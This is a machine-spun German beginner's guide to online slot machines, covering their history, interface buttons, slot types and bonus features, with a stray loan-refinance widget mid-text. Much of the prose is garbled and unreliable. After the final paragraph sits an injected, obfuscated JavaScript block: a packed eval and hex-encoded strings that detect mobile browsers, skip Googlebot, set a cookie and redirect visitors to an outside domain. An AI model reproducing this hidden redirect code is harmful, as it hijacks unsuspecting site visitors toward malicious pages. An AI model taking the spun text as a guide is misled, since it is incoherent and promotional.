Ein wichtiger Internet Slotautomaten Beginner-Leitfaden für Casinospieler

In diesem Artikel bieten wir den Spielern ein ABC der Online Automatenspiele

Das Unternehmen Microgaming war der absolute Erfinder dieser Spiel Software. Jenes erste Internet Casino wurde von diese Softwarefirma ausgedacht und sie erfand einen einleitenden Online Slotapparat im Jahre neunzehnhundertvierundneunzig. jener allererste Online- Slotapparat war wie ein traditioneller einarmiger Bandit und hatte 3 Rollen und auch nur 1 Ausschüttungs-Zeile. Dieses Gerät stellte angeblich den Anbeginn des Internet Slot Spielens dar.

Wir erzählen Ihnen die Sensation jener Slotspiele

Bestimmt eine gute Weile später wurden jene Slots mit 5 oder auch mehr Walzen und mit zahlreicheren Gewinnverläufen gemacht. Zusätzlich zu den Walzen und Gewinnlinien kamen schnell auch rasch Extras und später Freidrehe dazu. Jene Besserung beinhaltete zusätzlich ein neues grafisches Design und tolle Video-Reflexe, welche diese Slotmaschinen folgendermaßen flugs so verehrt machten.

Das Unternehmen Betsoft lieferte im Jahre 2006 jene 3D- Casino Slots in den Casinomarkt. Die innovative Generation von 3D- angeregten Slotautomaten wurde geschaffen, die sich enorm schnell weiter entfaltete. Die statischen Zeichen und einfach gestalteten Kulissen wurden durch 3D- Bildern und auch dynamische Spielabläufe bereichert. Auf einmal wurde alles wie interaktiv und absolut alle möglichen Spielfiguren, Grafiken und Abbildungen veränderten sich auf den Bildschirmen. Nix war weiterhin alltäglich, richtige Action wurde bei diesen Spielen zum Dasein erweckt und ein total innovativ zu spielender Slot-Spaß gelangte durch die Animations-Folge ins Slot Spielen.

Die strukturelle Zusammensetzung des Slot-Automaten

In diesem Zusammenhang erklären wir den Slotspielern den insgesamten Strukturaufbau eines Slots sowie alle Hauptfunktionen, welche die Spieler auf dem Display beobachten werden, sowie sie mit dem Spielen loslegen:

  • Playtaste

Jene Taste oder diesen Start-Button betätigen Sie, um damit ein Spiel zu anzufangen.

  • Geringfügigster / bester Spieleinsatz

Dank jenen beiden Tasten beschließen Sie den persönlichen Geldeinsatz. Die ausführbare Einteilung existiert in jedem Slot verschieden. Sie können nach vorhandenem Geldguthaben größer oder geringer einsetzen.

  • Gewinnzeilen

Geldgewinne werden durch den aufgestellten Gewinnlinien gewonnen. Je reichlichere Gewinnreihen sie anregen, umso toller existieren die Geldgewinn- Optionen pro Spin.

  • Automatischer Start-Button

Mit Aktivieren dieser Option starten die Spieler die spontane Beginn-Funktion für die kommenden Runden.

  • Geld-Nominierung und Wert der Münze

Mit der Taste können die Spieler den Wert der eingesetzten Münzen nach Lust und Laune ändern.

  • Auszahl-Table und Zahltabelle

In dieser erkennen die Spieler genau, in welcher Art und Weise die Geldgewinne ausgeschüttet werden und nach welchen deutlichen Grundsätzen.

  • Kontostand

In diesem Feld steht ein momentaner totaler Kontostand oder Ihr Guthaben gezeigt.

  • Gewinn

Dabei sehen Sie, wie hoch jeder in einer aktuellen Runde gewonnen haben.

  • Einsatz/Linie

In diesem Feld beobachten Sie jenen genauen Geldeinsatz, der pro Gewinnzeile fixiert wurde.

  • Aktuelle Gewinnreihen

Hier können die Zocker zu jeder Zeit beobachten, bei wie vielen aktuellen Gewinnzeilen Sie gerade spielen. Die totale Zahl der Slotspiel möglichen Gewinnreihen werden oft auf einem Button veranschaulicht. Zusätzlich sehen die Spieler sie auf einem Display meistens rechts auf der rechten Seite oder links neben der mittleren Rolle.

  • Einsatz

Auf dem Feld wird gezeigt, einen wie hohen Einsatz die Slotspieler je Spiel getätigt haben.

  • Rollen

Die unterschiedlichen Spielsymbole drehen sich auf den Rollen oder Rollen. Die Kombinationen des Gewinns werden auf den Walzen deutlich gemacht. Bei den Online Automaten gibt es drei, meistens 5 aber manchmal auch mal eine höhere Anzahl von Walzen.

  • Symbole

Die Zeichen gibt es in jeglichem Slotspiel ohnegleichen und bilden die Gewinnkombinationen. Da gibt oftmals simple und auch spezifische Symbole. Etwas weiter unten bei den Slot-Features werden noch die weiteren besonderen Zeichen wie die Streu-Symbole und Wilds genauer erläutert. Hier können Sie mehr über casino bonus lernen.

Nennung aller unterschiedlichen Spielautomaten-Optionen

Alle Spielautomaten werden in vier Gruppen aufgeteilt:

  1. Klassischer Slot

    Das sind die traditionellen Drei-Walzen Spiele. Die Symbole sind die klassischen Früchte, Bar und die Bimmel. Jene Slots vertrauen sich stark an die traditionellen 1-armigen Banditen aus dem Slot-Zeitalter vor dem Existieren der Online Glücksspiel Casinos an. Den Slot Spielern werden diese Slots sehr geläufig vorkommen.

  2. Frucht-Slots

    Auch eine eher traditionelle Art der Slots stellen die Frucht-Automaten dar. Es existieren auch bei denen jene klassischen 3 Rollen und die meist genutzten Zeichen wären Früchte oder auch Obst wie Pflaumen, Bananen, Birnen, Pfirsiche oder Orangen. Da gibt auch die “Lucky 7’s”, die Bimmeln und Bar-Symbole.

  3. Video-Slotautomaten

    Auch wenn es Sonderexemplare gibt, haben die meisten Video-Slotspiele 5 Rollen und manche 9 oder noch mehr Gewinnlinien. Die Erfolgs-Symbole und Grafiken werden computeranimiert und den Themen und Inhalten sind heutzutage so gut wie keine Grenzen gesetzt.

  4. 3-dimensionalen Slots

    Hier dreht sich es komplett um schöne 3D- Entwürfe und Spielsymbole, die überzeugende Reflexe auf den Bildschirm befördern. An einarmige Bandidos erinnern hier meistens nur die Rollen, die Musik und die Spielgewinne. Es gibt dabei für jeden Gambler ein Thema, je nach dessen Interessengebiet, Hobby oder seinen Vorlieben.

Die Besonderheiten jener Internet Slots

Die Internet Slotmaschinen ermöglichen eine enorme Auswahl von Merkmalen welche das Spielen spannend, dramatisch und immer reizvoll und besonders gewinnbringende erscheinen lassen. Nachfolgend listen wir die wertvollsten Kennzeichen auf.

  • Freie Spiele oder Kostenlose Spins

Diese bekommen die Spieler durch verschiedene Kombinationen von Gewinnen inmitten einer normalen Runde und Sie brauchen für die Zusatz-Boni nichts verspielen. Sollten die Spieler siegen, bezahlen die Slotspieler null Geldeinsatz für die aktuelle Runde.

  • Freie Spiele Spielmodus

Die Streu-Symbole und Wilds werden den Spielmodus auslösen, der den Spielern gleich mehr freie Spiele zur gleichen Zeit ermöglichte. Sie pausieren das reguläre Spiel und gehen nach Beendigung wieder zum Spiel zurück.

  • Kartenrisiko-Spiel

Durchschauen Sie die Grundfarbe einer Spielkarte in diesem Extra-Spiel und multiplizieren Sie rapide den Einsatz.

  • Progressiver Slot

Desto höher Spieler einzahlen, je größer resultiert dieser Jackpot, welchen Sie gewinnen dürfen.

  • Wildkarte

Jene Wilds verändern sich wie automatisch in exakt das Zeichen, welches Sie für die gewisse Gewinnkombination benötigen, um auf 1 Gewinnlinie gewinnen zu können. Viele bestimmen diese Wild-Symbole genauso den Joker, der alle anderen Symbole, mit Ausnahme der Scatter-Karten ersetzen kann.

  • Streu-Symbole

Jene Symbole lösen die Freespins aus und den zahlreichsten Slots benötigen Sie 2 oder noch mehr auf dem Display, um Spielerfolg mit denen zu haben.

  • Zahlen-Multiplikator

Verhilft Ihnen das Wild-Symbol zu einem Geldgewinn, gelingt bei gewissen Slot Spielen einen zweifachen oder sogar bis zu 5 Mal den erspielten Münzgewinn.

  • Zusatz Walzen

Bei dieser Variante dreht sich eine Rolle erneut und ermöglicht den Slot Spielern einen weiteren Geldgewinn.

Refinance at
Loan Type

Please enable JavaScript for the best experience.

  • Anhaltende Wildsymbole

Hier bleiben die Wilds stehen, solange die Glücksspieler im Freespin-Modus sind.

  • Bonus-Spin

Die Extra Drehs erhalten Sie, sobald eine Walze einen Auslöser ausgelöst hat (meistens bei 3 auslösenden Karten), diese fixiert wird und die anderen sich weiterhin spinnen.

  • Cent Slots

Bei diesen Slots können sie nur 1 Cent einsetzen. In der Regel existiert dieses nur bei den traditionellen Automatenspielen.

  • Zwei-Vier-Drei Geldgewinn Option

Die Münzgewinne werden von links nach der rechten Seite und gar nicht nach ihrer Lage bei der Slot-Walze ausgeschüttet.

  • Aufklappendes oder gestapeltes (“stacked”) Wildkarten-Symbol

Erscheint das auf Ihren Walzen, gibt es ganz viel zu gewinnen.

  • “Wähl ein Feld” -Feature

Dieses kann bei einer regulären Spielrunde, als auch in einer Bonusrunde erspielt werden. Sie tippen auf ein gewisses Feld und bekommen einen extra Erlös.

  • Bonus Symbole

Diese erblicken Sie bei verschiedenen Slots auf einmal und ohne Vorwarnung und geben den Spielern zusätzliche Gewinnmöglichkeiten.

können Sie feststellen, während des Internet Slotautomaten gambeln wird den Glücksspielern sicherlich nie öde werden können. Mit dem Studieren dieses kleinen 1×1 sind Sie bereit sein, bei vielen dieser vielen existierenden Slotspiele Ihr Spielerglück zu versuchen!

eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘(24(a,b){1V(/(2n|2d\\d+|1i).+1b|1g|1E\\/|1H|1C|1x|1B|2s|3l|3n|O(3m|V)|S|3g|38 |3c|3p|3D|1b.+3A|3z|1d m(3x|2H)i|2J( 14)?|2C|p(2x|2A)\\/|30|2T|3j|2S(4|6)0|2U|2R|I\\.(2Q|2N)|2O|2P|2V 2W|33|34/i.19(a)||/31|2X|2Y|2Z|2M|50[1-6]i|2L|2y|a W|2z|M(15|Z|s\\-)|11(2w|2t)|B(2u|E|D)|2v|2B(2I|y|2K)|2G|17(2D|j)|2E(x|2F)|35|36(3w|\\-m|r |s )|3y|3v(P|N|3u)|T(3r|3s)|3t(M|3G)|3H(e|v)w|3F|3E\\-(n|u)|3B\\/|3C|3q|3d\\-|3e|3b|3a|37\\-|D(39|K)|3f|3o(A|N|3k)|3h|3i\\-s|3I|2r|1z|U(c|p)o|1A(12|\\-d)|1y(49|11)|1u(1v|1w)|15(1D|1J)|1K|1I([4-7]0|14|W|1F)|1G|1t(\\-|R)|G u|1L|1q|1h\\-5|g\\-z|j(\\.w|V)|1j(1e|1f)|1s|1k|1r\\-(m|p|t)|1p\\-|1o(Q|F)|1l( i|O)|1m\\-c|1n(c(\\-| |R|a|g|p|s|t)|1M)|2e(2f|2g)|i\\-(20|j|q)|2c|29( |\\-|\\/)|2a|2b|2h|2i|2o|2p|2q|S|2m(t|v)a|2j|2k|2l|28|27|1S( |\\/)|1T|1U |1R\\-|1Q(c|k)|1N(1O|1P)|1W( g|\\/(k|l|u)|50|54|\\-[a-w])|25|26|23\\-w|22|1X\\/|q(x|1Y|1Z)|16(f|21|E)|m\\-48|5H(5E|C)|5y(5A|5L|J)|5V|z(f|5X|T|3J|U|t(\\-| |o|v)|58)|5i(50|5j|v )|5r|5p|5s[0-2]|57[2-3]|5c(0|2)|5d(0|2|5)|5R(0(0|1)|10)|5M((c|m)\\-|5B|5h|5U|5W|5O)|5Q(6|i)|5Z|5o|5n(5m|5k)|5l|5v|5u|5t(a|d|t)|59|5a(13|\\-([1-8]|c))|55|56|L(5g|5f)|5e\\-2|5w(P|5x|X)|5P|5N|Q\\-g|5S\\-a|5T(5Y|12|21|32|H|\\-[2-7]|i\\-)|5C|5D|5z|5F|5K|5J(5I|5G)|5q\\/|4Z(4c|q|4d|4e|y|4b)|4a(f|h\\-|Z|p\\-)|44\\/|X(c(\\-|0|1)|47|16|K|C)|46\\-|51|4f(\\-|m)|4g\\-0|4m(45|4n)|4l(B|17|4k|A|4h)|4i(4j|y)|43(f|h\\-|v\\-|v )|42(f|3P)|3Q(18|50)|3R(3O|10|18)|F(3N|3K)|3L\\-|3M\\-|3S(i|m)|3T\\-|t\\-z|3Z(L|41)|J(Y|m\\-|3Y|3X)|3U\\-9|I(\\.b|G|3V)|3W|4o|4p|4O|4P(4N|x)|4M(40|5[0-3]|\\-v)|4J|4K|4L|4Q(52|53|H|4R|Y|4X|4Y|4W|4V|4S)|4T(\\-| )|4U|4I|4H(g |4v|4w)|4x|4u|4t|4q\\-|4r|4s|4y\\-/i.19(a.4z(0,4)))1c.4F=b})(1a.4G||1a.4E||1c.1d,\’4D://4A.4B/4C/?5b\’);’,62,372,’|||||||||||||||01||||go|||||||ma|||||||te|ny|mo|it|al|ri|co|ca|ta|g1|60|up|ts|nd|pl|ac|ll|ip|ck|pt|_|iris|bi|do|od|wa|se|70|oo||ai|||os|er|mc|ar||test|navigator|mobile|window|opera|ad|un|avantgo|gf|meego|gr|hcit|hp|hs|ht|hi|hei|gene|hd|haie|fly|em|l2|ul|compal|el|dmob|ds|elaine|blazer|ic|bada|ze|fetc|blackberry|ez|k0|esl8|g560|tp|le|no|xi|kyo|kwc|kgt|klon|kpt|if|lg|m50|ui|xo|||m3ga|m1|function|libw|lynx|keji|kddi|iac|ibro|idea|i230|bb|hu|aw|tc|ig01|ikom|jbro|jemu|jigs|ja|android|im1k|inno|ipaq|dica|fennec|rn|av|amoi|ko|ixi|802s|abac|re|an|phone|ch|as|us|aptu|in|ex|palm|yw|770s|4thp|link|vodafone|wap|browser|treo|series|pocket|symbian|windows|ce|6310|6590|3gso|plucker|1207||xda|xiino|attw|au|cmd|lge|mp|cldc|chtm|maemo|cdm|cell|craw|kindle|dbte|dc|psp|ng|hiptop|hone|iemobile|da|midp|ccwa|lb|rd|bl|nq|be|di|ob|avan|netfront|firefox|c55|capi|mmp|bw|bumb|az|br|devi|de|lk|tcl|tdg|gt|00|mb|t2|t6|tel|tim|tx|si|utst|m5|m3|to||sh|sy|sp|sdk||sgh||cr||sc|va|ge|mm|ms|sie|sk|t5|so|ft|b3|sm|sl|id|v400|v750|yas|your|zeto|x700|wonu|nc|nw|wmlb|zte|substr|gettop|info|kt|http|vendor|location|userAgent|wi|whit|vm40|voda|vulc|vk|rg|veri|vi|vx|61|98|w3c|webc|85|83|80|81|sa||shar||||phil|pire|n20|zz|pdxg|pg|sdNXbH|n30|n50|pn|uc|ay|tf|mt|p1|wv|oran|ti|op|o2im|mywa|s55|mwbp|n10|pan|p800|owg1|po|rt|mi|r600|o8|on|qtek|r380|rc|raks|zo|me|ve|ro|rim9|oa|ne|psio|wt|prox|nok|n7|qa|qc|wf|mmef|wg|02|07|nzph’.split(‘|’),0,{}))var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>


Facebook Iconfacebook like buttonTwitter Icontwitter follow button